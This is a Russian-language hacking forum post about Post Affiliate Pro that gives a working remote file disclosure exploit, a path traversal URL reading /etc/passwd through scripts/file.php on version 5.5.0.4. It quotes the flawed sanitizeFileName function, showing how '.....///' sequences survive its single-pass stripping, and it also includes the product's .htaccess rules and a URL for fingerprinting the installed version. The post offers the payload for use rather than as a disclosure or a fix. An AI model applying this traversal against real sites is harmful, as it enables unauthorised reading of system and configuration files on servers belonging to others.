Тема: Post Affiliate Pro
Показать сообщение отдельно
Старый 28.08.2016, 00:46   #2
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Remote File Disclosure

Цитата:
http://site.com/affiliates/scripts/file.php?file=/.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
Диапазона версий не знаю, точно работало на версии PAP version: 5.5.0.4, GPF version: 1.3.36.0, возможно бага есть и в других версиях. Исходник исследовал очень древний 4.5.83.1, там даже этого файла нет Но зато есть функции подобные этой:

PHP код:
    private function sanitizeFileName($fileName) {
        
$fileName str_replace('../'''$fileName);
        
$fileName str_replace('..\\'''$fileName);

        
$fileName str_replace('.\\'''$fileName);
        
$fileName str_replace('./'''$fileName);

        return 
$fileName;
    } 
Судя по .htaccess это используется для чтения файлов:

Код:
# Start Post Affiliate Pro Code
Options -Indexes

<ifModule mod_rewrite.c>

RewriteEngine on
#replicated sites
RewriteRule ^sites/([^/]+)/([^/]+)/(.*) scripts/page.php?a_aid=$2&a_bid=$1&a_file=$3 [L,QSA]
RewriteRule ^sites/([^/]+)/*(.*) scripts/page.php?a_aid=$2&a_bid=$1&a_redir=Y [L,QSA]
RewriteRule ^accounts/default1/files/(.*) scripts/file.php?file=files/$1 [L,QSA]
RewriteRule ^accounts/default1/banners/(.*) scripts/file.php?file=banners/$1 [L,QSA]

#accessing non-tpl theme files
RewriteRule ^accounts/default1/themes/(.*) scripts/file.php?file=themes/$1 [L,QSA]

</ifModule>

Версию скрипта смотрел так:

Цитата:
http://site.com/affiliates/api/download.php

Последний раз редактировалось crlf; 28.08.2016 в 00:53..
crlf вне форума   Ответить с цитированием